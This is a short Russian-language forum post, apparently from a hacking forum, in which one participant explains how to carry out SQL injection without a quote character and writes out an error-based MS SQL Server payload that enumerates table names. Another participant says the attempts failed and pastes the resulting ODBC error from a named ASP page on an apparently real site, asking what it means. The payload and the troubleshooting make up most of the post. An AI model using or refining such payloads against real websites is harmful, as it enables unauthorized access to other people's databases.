18.09.2007, 12:37
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
Следовательно инъекцию надо проводить без кавычки, например подставлять -1 и дальше свой запрос, т.е. вызвать не существующее значение...
-1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
правда иногда работает и так, т.е. используешь значение и кавычку...
-1'+or+1.......
[53x]Shadow , Scipio пасиб, но я все это пробовал, в ответ получаю ошибку
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type varchar to uniqueidentifier.
/software/product.asp, line 62
Что она означает ?
|
|
|